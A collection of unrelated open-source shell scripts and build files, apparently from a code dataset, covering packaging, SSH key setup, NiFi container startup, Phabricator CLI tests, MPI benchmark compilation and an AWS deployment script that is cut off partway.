-v $VERSION \
--iteration ${BUILD_NUMBER} \
--before-install="${INSTALL_SCRIPT_DIR}/before-install.sh" \
--before-remove="${INSTALL_SCRIPT_DIR}/before-remove.sh" \
--after-remove="${INSTALL_SCRIPT_DIR}/after-remove.sh" \
--deb-user root \
--deb-group root \
--template-scripts \
--template-value name="${NAME}" \
--template-value project="${JOB_NAME}" \
--template-value branch="${GIT_BRANCH}" \
--template-value mode="${MODE}" \
--template-value install_dir="${INSTALL_DIR}" \
--template-value pid_dir="${PID_DIR}" \
--template-value log_dir="${LOG_DIR}" \
-C ${ROOT_ENV} ${DIRS}
}
cleanUp() {
echo "[*] cleaning up..."
rm -rf $ROOT_ENV
}
stage
createRootEnvironment
copyBinariesToRootEnvironment
renderAllTemplates
makeInitScriptExecutable
buildPackage
cleanUp
| true
|
323d399b656a3516c809b3337f091b51fa2f1cfc
|
Shell
|
cashgithubs/NLPClass
|
/lab4/java/run~
|
UTF-8
| 1,109
| 3.96875
| 4
|
[] |
no_license
|
#!/bin/sh
#
# You may find this shell script helpful.
#
tmp=/tmp
subdir=sentiment-data
data=/courses/nchamber/nlp/lab4/data
# These statements copy the data directory above to the local machine.
# The tweets are 100's of MBs, so we don't want our Java code
# constantly making NFS calls. Copy it all into /tmp/sentiment-data.
cpdata=$data
if [ -d $tmp ]; then
# If our /tmp directory does not exist, create it and copy data.
if [ ! -d $tmp/$subdir ]; then
mkdir $tmp/$subdir
chmod 777 $tmp/$subdir
# If mkdir succeeded, copy data.
if [ -d $tmp/$subdir ]; then
echo "Copying data to your local machine."
echo "This is a one-time operation. Please wait."
echo "We're saving the NFS for everyone!"
cpdata=$tmp/$subdir
cp -R $data/* $cpdata/
chmod -R a+r $cpdata
fi
fi
# Set the /tmp path.
if [ -d $tmp/$subdir ]; then
cpdata=$tmp/$subdir
fi
fi
# Run the program.
echo "Data directory: $cpdata"
java -mx1500m -cp classes usna.sentiment.TrainTest \
-data $cpdata \
$@
| true
|
e257b0d9a8781008f103ff7b6d3e4e12f69d52bb
|
Shell
|
sokangmin/wini-nifi
|
/docker/sh/start.sh
|
UTF-8
| 2,382
| 3.25
| 3
|
[] |
no_license
|
#!/bin/sh -e
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
scripts_dir='/opt/nifi/scripts'
[ -f "${scripts_dir}/common.sh" ] && . "${scripts_dir}/common.sh"
# Override JVM memory settings
if [ ! -z "${NIFI_JVM_HEAP_INIT}" ]; then
prop_replace 'java.arg.2' "-Xms${NIFI_JVM_HEAP_INIT}" ${nifi_bootstrap_file}
fi
if [ ! -z "${NIFI_JVM_HEAP_MAX}" ]; then
prop_replace 'java.arg.3' "-Xmx${NIFI_JVM_HEAP_MAX}" ${nifi_bootstrap_file}
fi
if [ ! -z "${NIFI_JVM_DEBUGGER}" ]; then
uncomment "java.arg.debug" ${nifi_bootstrap_file}
fi
# Establish baseline properties
prop_replace 'nifi.web.https.host' "${NIFI_WEB_HTTPS_HOST:-$HOSTNAME}"
if [ -n "${SINGLE_USER_CREDENTIALS_USERNAME}" ] && [ -n "${SINGLE_USER_CREDENTIALS_PASSWORD}" ]; then
${NIFI_HOME}/bin/nifi.sh set-single-user-credentials "${SINGLE_USER_CREDENTIALS_USERNAME}" "${SINGLE_USER_CREDENTIALS_PASSWORD}"
fi
# Check if the user has specified a nifi.web.proxy.host setting and handle appropriately
if [ -z "${NIFI_WEB_PROXY_HOST}" ]; then
echo 'NIFI_WEB_PROXY_HOST was not set but NiFi is configured to run in a secure mode. The NiFi UI may be inaccessible if using port mapping.'
else
prop_replace 'nifi.web.proxy.host' "${NIFI_WEB_PROXY_HOST}"
fi
# Continuously provide logs so that 'docker logs' can produce them
"${NIFI_HOME}/bin/nifi.sh" run &
nifi_pid="$!"
tail -F --pid=${nifi_pid} "${NIFI_HOME}/logs/nifi-app.log" &
trap 'echo Received trapped signal, beginning shutdown...;./bin/nifi.sh stop;exit 0;' TERM HUP INT;
trap ":" EXIT
echo NiFi running with PID ${nifi_pid}.
wait ${nifi_pid}
| true
|
15a029bd707a12cee8873ea8b8ba7787322e1f70
|
Shell
|
TheArqsz/auto-ssh-key
|
/auto-ssh-key.sh
|
UTF-8
| 6,649
| 4.3125
| 4
|
[
"MIT"
] |
permissive
|
#!/usr/bin/env bash
# Bash script that generates ssh key and upload it to remote server
#
# Copyright 2021 TheArqsz
# sshpass is needed for smooth passing password to ssh commands
if ! command -v sshpass &> /dev/null
then
echo "sshpass could not be found"
echo "Use: sudo apt install sshpass"
exit 1
fi
# Print usage of this script
help()
{
echo "Usage: ./`basename "$0"` -u USER -p -i IP..."
echo "Generate SSH keys and copy them to remote"
echo
echo "Mandatory arguments:"
echo " -u, --user Specifies username"
echo " -i, --ip Specifies IP or domain"
echo " -p, --password Prompt for ssh password"
echo " Instead of password, you can use existing SSH key"
echo " --key Specifies existing SSH key"
echo
echo "Optional arguments:"
echo " -s, --port Specifies ssh port (default: 22)"
echo " -f, --file Specifies generated ssh key filename (default: current-timestamp_id_rsa)"
echo " -h, --help Displays this help"
echo " -l, --logs Specifies error log file (default: `basename "$0"`.log)"
echo " -t, --type Specifies type of a SSH key (default: rsa)"
echo " -b, --bytes Specifies the number of bits in the key to create (default: 4096)"
echo " --no-prune Do not remove generated keys if error occured. Do not remove public key if script finished properly"
echo
}
# Print banner with the name of the script
banner()
{
cat << EOF
┌─┐┬ ┬┌┬┐┌─┐ ┌─┐┌─┐┬ ┬ ┬┌─┌─┐┬ ┬
├─┤│ │ │ │ │───└─┐└─┐├─┤───├┴┐├┤ └┬┘
┴ ┴└─┘ ┴ └─┘ └─┘└─┘┴ ┴ ┴ ┴└─┘ ┴
EOF
}
# Set global variables and empty error log file
error_log_file=`basename "$0"`.log
echo `date` > $error_log_file
error_log_file=$(realpath $error_log_file)
prune=1
ssh_port=22
ssh_key_type=rsa
ssh_key_bytes=4096
current_timestamp=$(date +"%s")
key_name=${current_timestamp}_id_rsa
# Traps
failure() {
local lineno=$1
local msg=$2
if [ "$1" != "0" ]; then
echo " > [`date`] Failed at line $lineno: '$msg'" >> $error_log_file
fi
}
trap 'failure ${LINENO} "$BASH_COMMAND"' ERR
cleanup() {
if [ "$?" = "0" ]; then
echo "Script finished - cleaning logs"
read -p "Press CTRL-C to interrupt cleaning or wait 5 sec to continue" -t 5
echo
rm $error_log_file 2>/dev/null
fi
}
trap cleanup EXIT
function ctrl_c() {
echo
echo "Interrupting..."
exit 1
}
trap ctrl_c INT
# Loop that sets arguments for the script
while [ -n "$1" ]; do
case "$1" in
-h|--help)
banner
help
exit;;
-u|--user)
username=$2
shift
;;
-i|--ip)
ip=$2
shift
;;
-p|--password)
echo "WARNING You will be asked for a password - no ouput will be shown."
read -s -p "Enter password: " password
shift 0
;;
-s|--port)
ssh_port=$2
shift
;;
--key)
existing_key=$2
shift
;;
-f|--file)
key_name=$2
shift
;;
-l|--logs)
log_file=$2
shift
;;
-t|--type)
ssh_key_type=$2
shift
;;
-b|--bytes)
ssh_key_bytes=$2
shift
;;
--no-prune)
prune=0
shift 0
;;
*)
echo "Option '$1' is not recognized"
echo
help
exit 1
;;
esac
shift
done
# Check mandatory arguments
if [ -z "$username" ]; then
echo "Username cannot be empty - specify username"
exit 1
fi
if [ -z "$ip" ]; then
echo "Target cannot be empty - specify IP or domain"
exit 1
fi
if [ -z "$password" ]; then
echo "Password is empty - checking if existing key is used"
if [ -z "$existing_key" ]; then
echo "SSH key cannot be empty when password is empty - specify SSH key or password"
exit 1
fi
fi
# Show banner before the main part of script
banner
# Check if script can connect to ssh server with password
if [ ! -z "$password" ]; then
sshpass -p $password ssh -o StrictHostKeyChecking=no -o ConnectTimeout=5 $username@$ip -p $ssh_port exit 2>>$error_log_file
elif [ ! -z "$existing_key" ]; then
ssh -i $existing_key -o StrictHostKeyChecking=no -o ConnectTimeout=5 $username@$ip -p $ssh_port exit 2>>$error_log_file
else
echo "ERROR"
exit 1
fi
if [ $? != "0" ]; then
echo "Cannot confirm that SSH server is working"
echo "Check your credentials, port or server status"
echo "Check logs in $error_log_file"
exit 1
else
echo "Connected as $username to ssh://$ip:$ssh_port"
echo
fi
# Generate SSH keys
ssh-keygen -q -t $ssh_key_type -b $ssh_key_bytes -N '' -f $key_name -C ${username}-secret_token 2>$error_log_file
if [ $? != "0" ]; then
echo "Cannot generate SSH keys named $key_name"
echo "Check logs in $error_log_file"
if [ $prune = "1" ]; then
echo "Removing all generated keys"
rm ${key_name}*
fi
exit 1
else
echo "Generated SSH keys - $key_name and ${key_name}.pub"
echo
fi
# Copy public key to remote server
if [ ! -z "$password" ]; then
sshpass -p $password ssh-copy-id -o StrictHostKeyChecking=no -p $ssh_port -i ${key_name} $username@$ip 2>>$error_log_file 1>>$error_log_file
elif [ ! -z "$existing_key" ]; then
ssh-copy-id -f -o "IdentityFile=$existing_key" -o StrictHostKeyChecking=no -p $ssh_port -i ${key_name} $username@$ip 2>>$error_log_file 1>>$error_log_file
else
echo "ERROR"
exit 1
fi
if [ $? != "0" ]; then
echo "Cannot copy public key ${key_name}.pub"
echo "Check logs in $error_log_file"
if [ $prune = "1" ]; then
echo "Removing all generated keys"
rm ${key_name}*
fi
exit 1
else
echo "Public key ${key_name}.pub copied successfuly to remote server"
if [ $prune = "1" ]; then
echo "Removing public key from local file system"
rm ${key_name}.pub
fi
echo
fi
# Check if SSH keys are properly set
ssh -o StrictHostKeyChecking=no -o ConnectTimeout=5 -i $key_name $username@$ip -p $ssh_port exit 2>>$error_log_file
if [ $? != "0" ]; then
echo "Cannot connect to SSH server"
echo "Check logs in $error_log_file"
if [ $prune = "1" ]; then
echo "Removing all generated keys"
rm ${key_name}*
fi
exit 1
else
echo "SSH keys are working properly"
echo
echo "Your SSH key: "
echo " ${key_name}"
echo
echo "You can log in to you server with:"
echo " ssh -p ${ssh_port} -i ${key_name} ${username}@${ip}"
fi
| true
|
154d54df59098a3e8e60c191c7b97f7c3a3f4917
|
Shell
|
fhdk/project-sx
|
/calamares-oem/PKGBUILD
|
UTF-8
| 1,400
| 2.59375
| 3
|
[] |
no_license
|
# Maintainer: Philip Müller <philm@manjaro.org>
# Maintainer: Bernhard Landauer <oberon@manjaro.org>
pkgbase=calamares-oem
pkgname=("calamares-oem-modules" "calamares-oem-sx-settings")
pkgver=20180217
pkgrel=1
arch=('any')
_repo=project-sx
_commit=f10c08f0e60ea1564423a1a6fdf833c7db61d582
url="https://github.com/philmmanjaro/$_repo"
license=('GPL3')
makedepends=('git')
source=("git+$url.git" 'cleanupoem.service')
md5sums=('SKIP'
'89410e5af734c7585b58530cba9d9685')
pkgver() {
date +%Y%m%d
}
package_calamares-oem-modules() {
pkgdesc="Manjaro OEM Modules"
depends=('calamares' 'calamares-oem-settings')
install=calamares-oem-modules.install
cd "${_repo}/${pkgbase}"
install -d "${pkgdir}"/usr/lib/calamares
cp -r modules "${pkgdir}"/usr/lib/calamares
install -Dm644 postinstall-settings/settings.conf "${pkgdir}"/etc/calamares/settings.conf
install -Dm644 postinstall-settings/welcome.conf "${pkgdir}"/etc/calamares/modules/welcome.conf
install -Dm644 postinstall-settings/users.conf "${pkgdir}"/etc/calamares/modules/users.conf
install -Dm644 postinstall-settings/finished.conf "${pkgdir}"/etc/calamares/modules/finished.conf
install -Dm644 cleanupoem.service "${pkgdir}"/opt/calamares/cleanupoem.service
}
package_calamares-oem-sx-settings() {
pkgdesc="Manjaro OEM SX-Settings"
provides=('calamares-oem-settings')
cd "${_repo}/${pkgbase}"
install -d "${pkgdir}"/etc
cp -r oemskel "${pkgdir}"/etc
}
| true
|
df1a8b9bd9ed565053c6abe9c4170a07455b3254
|
Shell
|
20after4/phabricator-tools
|
/testbed/arcyon/exercise_arcyon.sh
|
UTF-8
| 2,906
| 2.84375
| 3
|
[
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
trap "echo 'FAILED!'; exit 1" ERR
set -x
# cd to the dir of this script, so paths are relative
cd "$(dirname "$0")"
arcyon='../../bin/arcyon'
$arcyon -h
$arcyon comment -h
$arcyon comment-inline -h
$arcyon get-diff -h
$arcyon paste -h
$arcyon query -h
$arcyon raw-diff -h
$arcyon show-config -h
$arcyon update-revision -h
$arcyon task-create -h
$arcyon task-query -h
id="$($arcyon create-revision -t title -p plan --summary ssss -f diff1 --format-id)"
$arcyon get-diff -r $id --ls
$arcyon update-revision $id update -f diff2
$arcyon get-diff -r $id --ls
$arcyon query --format-type ids | grep $id
$arcyon query --ids $id --format-string '$summary' | grep ssss
$arcyon query --format-type ids --order created | grep $id
$arcyon query --format-type ids --order modified | grep $id
diffid="$($arcyon raw-diff diff1)"
diffid2="$($arcyon raw-diff diff2)"
$arcyon get-diff -d $diffid --ls
$arcyon get-diff -d $diffid2 --ls
id2="$($arcyon create-revision -t title2 -p plan --diff-id $diffid --format-id)"
id3=$($arcyon update-revision $id2 update --diff-id $diffid2 --format-id)
$arcyon update-revision $id2 update --diff-id $diffid2 --format-url
$arcyon update-revision $id2 update --diff-id $diffid2 --format-url --ccs phab --reviewers bob
if [ "$id2" != "$id3" ]; then
false
fi
$arcyon query --format-type ids | grep $id2
$arcyon comment $id2 -m 'hello there!'
$arcyon comment-inline $id2 --start-line 51 --end-line-offset 0 --filepath 'bin/arcyon' -m 'inline comment!'
$arcyon comment-inline $id2 --start-line 51 --end-line-offset 0 --filepath 'bin/arcyon' -m 'old-side inline comment!' --left-side
$arcyon comment $id2 --attach-inlines
taskid=$($arcyon task-create 'exercise task-create' -d 'description' -p wish -o alice --ccs phab bob --format-id)
$arcyon task-query
taskid2=$($arcyon task-query --max-results 1 --format-ids)
if [ "$taskid" != "$taskid2" ]; then
false
fi
$arcyon task-create 'exercise task-create again'
$arcyon task-update $taskid -m 'just a comment'
$arcyon task-update $taskid -t 'exercise task-update' -d 'new description' -p low -o bob --ccs phab alice -m 'updated loads'
$arcyon paste "test paste" -f diff1
# -----------------------------------------------------------------------------
# Copyright (C) 2013-2015 Bloomberg Finance L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ------------------------------ END-OF-FILE ----------------------------------
| true
|
39a1c567acd63ced3d762572cdd459186d46bb16
|
Shell
|
bbyun28/openmm-tutorial-msbs
|
/clean.sh
|
UTF-8
| 520
| 3.328125
| 3
|
[
"LicenseRef-scancode-public-domain",
"CC-BY-4.0"
] |
permissive
|
#!/usr/bin/env bash
# Strip withspace form markdown files
for file in $(find . | grep 'md$'); do
echo Cleaning ${file}
sed -i -e $'s/\t/ /g' ${file}
sed -i -e $'s/[ \t]\+$//' ${file}
sed -i -e :a -e '/^\n*$/{$d;N;ba' -e '}' ${file}
done
# Remove nbconvert outputs
rm */*.nbconvert.ipynb
# Strip output cells from notebooks
for file in $(git ls-files | grep 'ipynb$'); do
echo Cleaning ${file}
jupyter nbconvert ${file} --to notebook --inplace --nbformat 4 --ClearOutputPreprocessor.enabled=True
done
| true
|
5d5e5cc82a1939ec1cfbf3a5c6cba5dd8e7af05d
|
Shell
|
fuzzy76/dotfiles
|
/scripts/start.sh
|
UTF-8
| 628
| 3.921875
| 4
|
[
"BSD-2-Clause"
] |
permissive
|
#!/bin/bash
# This file check outs the repository and starts the rest of the installation from inside.
# Check for git command
command -v git >/dev/null 2>&1 || { echo "git missing. Make sure it is available before running." >&2; exit 1; };
# Check for key, generate if missing
if [ ! -d "$HOME/.ssh" ]; then
ssh-keygen -t rsa -b 4096
fi
# If we dont have the dotfiles repo, get it
if [ ! -d "$HOME/repos/dotfiles" ]; then
mkdir -p $HOME/repos
git clone git@github.com:fuzzy76/dotfiles.git $HOME/repos/dotfiles
fi
# Change to dotfiles folder and start installation
cd $HOME/repos/dotfiles || exit;
source scripts/install.sh
| true
|
024fcfdaef9434369c6486af46f57594a1eedadc
|
Shell
|
ducet8/dotfiles
|
/etc/bash.d/duce/batdiff.sh
|
UTF-8
| 190
| 2.59375
| 3
|
[] |
no_license
|
# vim: ft=sh
# 2023.08.14 - ducet8@outlook.com
if ! type -P bat &>/dev/null && type -P git &>/dev/null; then
return 0
fi
batdiff() {
git diff --name-only --diff-filter=d | xargs bat --diff
}
| true
|
48e1c816a5abd18e90eee43db89faf383b50bdee
|
Shell
|
developmentseed/house-gerrymandering-2018
|
/bin/scripts/tiger-to-topojson.sh
|
UTF-8
| 1,105
| 3.109375
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
WORK=./bin/data
BIN=./node_modules/.bin
FILE=us_cd115_updated_pa
echo "Converting $WORK/$FILE/$FILE.shp to geojson"
ogr2ogr -f GeoJSON -t_srs crs:84 \
$WORK/$FILE.json \
$WORK/$FILE/$FILE.shp
echo "Converting to ndjson"
cat $WORK/$FILE.json | jq -c "." | $BIN/ndjson-split 'd.features' > $WORK/$FILE-nd.json
echo "Filtering properties"
cat $WORK/$FILE-nd.json \
| $BIN/ndjson-map 'd.properties = { stateFips: d.properties.STATEFP, fips: d.properties.CD115FP, id: "" + d.properties.STATEFP + d.properties.CD115FP }, d' \
| $BIN/ndjson-filter '+d.properties.stateFips <= 56' \
> $WORK/$FILE-filtered-nd.json
echo "Converting to topojson"
./node_modules/.bin/geo2topo -n districts=$WORK/$FILE-filtered-nd.json > $WORK/$FILE-topo.json
echo "Simplifying and quantizing"
$BIN/toposimplify -S 0.04 -f < $WORK/$FILE-topo.json > $WORK/$FILE-simple-topo.json
$BIN/topoquantize 1e4 < $WORK/$FILE-simple-topo.json > $WORK/$FILE-quantized-topo.json
echo "Creating a reference geojson"
$BIN/topo2geo districts=$WORK/$FILE-geo.json < $WORK/$FILE-quantized-topo.json
echo "Done!"
ls -lah $WORK
| true
|
a5a28875ca5c71bc87b5c95ec6fa28ac55179b68
|
Shell
|
h4g0/esc-trabalhos
|
/assignment1/src/esc-nas/mpi_pbs/compile_mpi.pbs
|
UTF-8
| 1,745
| 2.984375
| 3
|
[] |
no_license
|
#!/bin/bash
#PBS -l nodes=1:ppn=1:r662
#PBS -l walltime=00:20:00
#PBS -V
module load gcc/5.3.0
cd esc-nas/NPB3.3.1/NPB3.3-MPI
compilers=("gnu_mpich_eth,1.2.7" "gnu_mpich2_eth,1.5" "intel_eth,1.6.3" "intel_mpich_eth,1.2.7" "intel_mpich2_eth,1.5" "intel_eth,1.8.2" "gnu_eth,1.8.2" "gnu_eth,1.6.3")
for i in ${compilers[@]};
do
IFS=',' read compiler version <<< "$i"
rm bin/*
if [[ $compiler = "intel_mpich_eth" ]];
then
echo "compiler 1"
cp config/mpich.def config/make.def
module load intel/mpich_eth/$version
source /share/apps/intel/parallel_studio_xe_2019/compilers_and_libraries_2019/linux/bin/compilervars.sh intel64
elif [[ $compiler = "gnu_mpich_eth" ]];
then
echo "compiler 2"
cp config/mpich.def config/make.def
module load gnu/mpich_eth/$version
elif [[ $compiler = "gnu_mpich2_eth" ]];
then
echo "compiler 2"
cp config/mpich.def config/make.def
module load gnu/mpich2_eth/$version
elif [[ $compiler = "intel_mpich2_eth" ]];
then
echo "compiler 2"
cp config/mpich.def config/make.def
module load intel/mpich2_eth/$version
source /share/apps/intel/parallel_studio_xe_2019/compilers_and_libraries_2019/linux/bin/compilervars.sh intel64
elif [[ $compiler = "intel_eth" ]];
then
echo "compiler 3"
cp config/openmpi.def config/openmpi.def
module load intel/openmpi_eth/$version
source /share/apps/intel/parallel_studio_xe_2019/compilers_and_libraries_2019/linux/bin/compilervars.sh intel64
elif [[ $compiler = "gnu_eth" ]]
then
echo "compiler 4"
cp config/openmpi.def config/openmpi.def
module load gnu/openmpi_eth/$version
fi
echo $compiler.$version
rm -r $compiler.$version
mkdir $compiler.$version
make clean
make suite
mv bin/* $compiler.$version
done
| true
|
dc81436661c9493cf8b19c504a06405341b61903
|
Shell
|
NixOS/nixpkgs-channels
|
/pkgs/development/libraries/science/math/tensorflow/prefetcher.sh
|
UTF-8
| 776
| 3.203125
| 3
|
[
"MIT"
] |
permissive
|
#!/usr/bin/env bash
version=1.14.0
hashfile=binary-hashes.nix
rm -f $hashfile
echo "{" >> $hashfile
echo "version = \"$version\";" >> $hashfile
for sys in "linux" "darwin"; do
for tfpref in "cpu" "gpu"; do
for platform in "x86_64"; do
if [ $sys = "darwin" ] && [ $tfpref = "gpu" ]; then
continue
fi
url=https://storage.googleapis.com/tensorflow/libtensorflow/libtensorflow-$tfpref-$sys-$platform-$version.tar.gz
hash=$(nix-prefetch-url $url)
echo "\"${tfpref}-${sys}-${platform}\" = {" >> $hashfile
echo " url = \"$url\";" >> $hashfile
echo " sha256 = \"$hash\";" >> $hashfile
echo "};" >> $hashfile
done
done
done
echo "}" >> $hashfile
| true
|
24f27fac25985356c67d23ccc55527642c7e3f10
|
Shell
|
tsw1985/CharvaHelloWorld
|
/run/run.sh.backup
|
UTF-8
| 2,239
| 3.21875
| 3
|
[] |
no_license
|
#!/bin/bash
# This script runs the Charva test program (if it is invoked as
# "test.sh swing", then the Swing version of the tutorial application
# is started instead).
# JAVA_HOME must be set to the JDK or JRE installation directory (for example,
# /usr/local/jdk1.4 or /usr/local/jre1.4).
clear
export LD_LIBRARY_PATH=/home/gabriel/eclipseprojects/CharvaHelloWorld/run
# Uncomment the next line to log keystrokes and mouse-clicks, and
# to debug key-mappings (the logfile in this case is $HOME/script.charva).
TEST_OPTS="-Dcharva.script.record=${HOME}/script.charva"
# Uncomment the following line to play back a script that was previously
# recorded using "charva.script.record".
# This line will cause the script to loop three times, at a speeded-up rate (5 times the speed of the recording).
#TEST_OPTS="-Dcharva.script.playbackFile=${HOME}/script.charva -Dcharva.script.playbackLoops=3 -Dcharva.script.playbackRate=5"
# Uncomment the next line to enable color.
TEST_OPTS="${TEST_OPTS} -Dcharva.color=1"
# Uncomment the following option to test for memory leaks.
#TEST_OPTS="${TEST_OPTS} -Xrunhprof:heap=sites"
# Note that the "-classic" option is no longer supported in JDK1.4,
# but in JDK1.3 and earlier it is useful on Linux because otherwise
# (on Linux kernels before 2.6) each Charva application shows up as
# dozens of processes (one for each thread).
#TEST_OPTS="-classic ${TEST_OPTS}"
# Uncomment the following line if you want to debug the application
# using an IDE such as IntelliJ IDEA (I believe that other IDEs such
# as NetBeans and JBuilder have the same capability).
#TEST_OPTS="${TEST_OPTS} -Xdebug -Xnoagent -Djava.compiler=NONE -Xrunjdwp:transport=dt_socket,server=y,suspend=n,address=5005"
echo Creating .jar ...
cd ../src/main
javac -cp ".:/home/gabriel/eclipseprojects/CharvaHelloWorld/lib/charva.jar" *.java
jar cvfe program.jar program *.class
${JAVA_HOME}/bin/java \
${TEST_OPTS} \
-cp ".:main/:/home/gabriel/eclipseprojects/CharvaHelloWorld/run/commons-logging.jar:/home/gabriel/eclipseprojects/CharvaHelloWorld/run/log4j-1.2.8.jar:/home/gabriel/eclipseprojects/CharvaHelloWorld/src:/home/gabriel/eclipseprojects/CharvaHelloWorld/run/classes" \
main.Main 2> charva.log
stty sane
| true
|
b647c4271decdeee77f632499eab5199eb613cc4
|
Shell
|
rbgarga/my-desktop-config
|
/bin/vol.sh
|
UTF-8
| 649
| 3.765625
| 4
|
[] |
no_license
|
#!/bin/sh
echo "$@" >> /tmp/debug
action=$1
cur_vol=$(mixer -S vol | cut -d: -f2)
save_vol() {
if [ "$cur_vol" = "0" ]; then
return
fi
echo "$cur_vol" > /tmp/.saved_vol
}
restore_vol() {
local _vol=50
if [ -f /tmp/.saved_vol ]; then
_vol=$(cat /tmp/.saved_vol)
fi
echo "$_vol"
}
case "$action" in
up)
vol="+1"
;;
down)
vol="-1"
;;
[0-9]*)
vol="$action"
;;
mute)
save_vol
vol="0"
;;
unmute)
vol=$(restore_vol)
;;
toggle)
if [ "$cur_vol" = "0" ]; then
exec $0 unmute
else
exec $0 mute
fi
exit 0
;;
show)
echo "$cur_vol"
exit 0
;;
*)
exit 1
esac
mixer vol "$vol" >/dev/null 2>&1
| true
|
b8ae7dd904aef24d0655a2fd79b18f39dfbef556
|
Shell
|
juanka1995/ingenieria_informatica_etsiit
|
/AÑO 1/fundamentos_del_software/Practicas/Sesiones/Sesion 6/Ejercicio 6.2
|
UTF-8
| 765
| 3.953125
| 4
|
[] |
no_license
|
#!/bin/bash
#Filtro para que la entrada de datos sea 1
if [ $# -eq 1 ]; then
#Compruebo que el parametro introducido sea un directorio
if test -d $1; then
# Guardo en archivo una lista con todo el contenido del directorio introducido
# grep -v '/$' elimina la linea con el propio directorio
for archivo in $(find $1 -maxdepth 1 | grep -v '/$')
do
#Compruebo el contenido de la lista viendo si es Fichero, Directorio o Enlace
if test -f $archivo; then
echo "Fichero regular: $archivo"
elif test -d $archivo; then
echo "Directorio: $archivo"
elif test -L $archivo; then
echo "Enlace: $archivo"
fi
done
else
echo "$1 no es un directorio existente"
fi
else
echo "Introduce los parametros correctos"
fi
| true
|
6b5c8ee61f079f0816cf7ec9672577d79923b593
|
Shell
|
zendegani/scripts
|
/old/scripts/0.0_Code&Scripts/s6disp_pre_endmmbr
|
UTF-8
| 893
| 3.171875
| 3
|
[
"BSD-3-Clause"
] |
permissive
|
#!/bin/sh
cd Q-Al-Mg
#module load sphinx/serial/2.0.4
#run this script in main folder Q-Al-Mg
folder=`ls -1d [0-9]*`
here=`pwd`
for f in $folder; do
echo $f
cd $f/finite
head -28 relax/CONTCAR > POSCAR
echo 'convert POSCAR to strcut'
sxstructprint --vasp -i POSCAR > struct.sx
echo 'generating supercell'
sxstructrep -r 1x1x2 -i struct.sx -o Sstruct.sx > sxstructrep.log
echo 'convert Supercell to POSCAR'
sx2poscar -i Sstruct.sx -o SPOSCAR > sx2poscar.log
echo 'generating displacements'
sxuniqdispl -d 0.02 -i Sstruct.sx > sxuniqdispl.log
echo 'generating displaced POSCAR'
ndir=`ls -1d i*.* | wc -l`
for (( i=1; i<$ndir+1; i++ )); do
sx2poscar -i input-disp-$i.sx -o SPOSCAR$i > sx2poscar.log
mkdir 1_$i
mv SPOSCAR$i 1_$i/POSCAR
done
echo 'background'
mkdir forces_background
mv SPOSCAR forces_background/POSCAR
cd $here
done
| true
|
82fb9ade8201ca3a8c70c2cf91d4f3523adef35e
|
Shell
|
delkyd/alfheim_linux-PKGBUILDS
|
/psp-sdl_ttf/PKGBUILD
|
UTF-8
| 1,086
| 2.859375
| 3
|
[] |
no_license
|
pkgname=psp-sdl_ttf
pkgver=2.0.11
pkgrel=1
pkgdesc="A simple library to load ttfs of various formats as SDL surfaces (psp)"
arch=('any')
url="http://www.libsdl.org/projects/SDL_ttf/"
license=('custom')
depends=('psp-sdk' 'psp-sdl' 'psp-freetype2')
makedepends=('psp-gcc' 'psp-pkg-config')
options=('staticlibs' '!buildflags' '!strip')
source=("http://www.libsdl.org/projects/SDL_ttf/release/SDL_ttf-${pkgver}.tar.gz"
"SDL_ttf-${pkgver}-PSP.patch")
md5sums=('SKIP'
'SKIP')
prepare() {
cd "$srcdir/SDL_ttf-$pkgver"
rm -f README.PSP
patch -Np1 -i ../SDL_ttf-${pkgver}-PSP.patch
}
build() {
cd "$srcdir/SDL_ttf-$pkgver"
sh autogen.sh
export LDFLAGS="-L$(psp-config --pspsdk-path)/lib -L$(psp-config --psp-prefix)/lib -lc -lpspuser"
export LIBS="-lc -lpspuser"
mkdir -p build-psp && pushd build-psp
../configure --prefix=/usr/psp --host=psp \
--with-sdl-prefix=$(psp-config --psp-prefix) --with-freetype-prefix=$(psp-config --psp-prefix) --without-x
make
}
package() {
cd "$srcdir/SDL_ttf-$pkgver/build-psp"
make DESTDIR="$pkgdir" install
}
| true
|
f9d0ec8de313964fdce738a2d55008edb84782a8
|
Shell
|
stelligent/blog_refactor_nodejs
|
/pipelines/deploy.sh
|
UTF-8
| 2,367
| 3.234375
| 3
|
[
"MIT"
] |
permissive
|
#bin/bash
# these environment variables should be in the script executor's profile
export AWS_REGION="us-east-1"
export AWS_VPC_ID="vpc-857a3ee2"
export AWS_SUBNET_IDS="subnet-c5a76a8c,subnet-3b233a06"
export AWS_AZS="us-east-1c,us-east-1b"
export AWS_KEYPAIR="dugas-labs"
# set up local variables
app_name=NodeJSApp
repository_url=https://github.com/stelligent/blog_refactor_nodejs
repository_branch=master
aws_region=${AWS_REGION:-us-east-1}
aws_vpc=${AWS_VPC_ID}
aws_subnets=${AWS_SUBNET_IDS}
aws_azs=${AWS_AZS}
aws_keypair=${AWS_KEYPAIR}
# fetch source code:
rm -rf .working-folder
git clone --branch ${repository_branch} --depth 1 ${repository_url} .working-folder
# perform static analysis on the code
pushd ./.working-folder
foodcritic -t ~FC001 "pipelines/cookbooks/${app_name}" -P
find . -name "*.js" -print0 | xargs -0 jslint
popd
# create a timestamp for naming the application's CloudFormation stack
stamp=$(date +%Y%m%d%H%M%s)
# run aws cli for cloudformation of ASG
asg_stack_name="${app_name}-${stamp}"
cfn_template=${DEPLOY_TEMPLATE:-./cfn/deploy-app.template}
aws cloudformation create-stack \
--disable-rollback \
--region ${aws_region} \
--stack-name ${asg_stack_name} \
--template-body file://${cfn_template} \
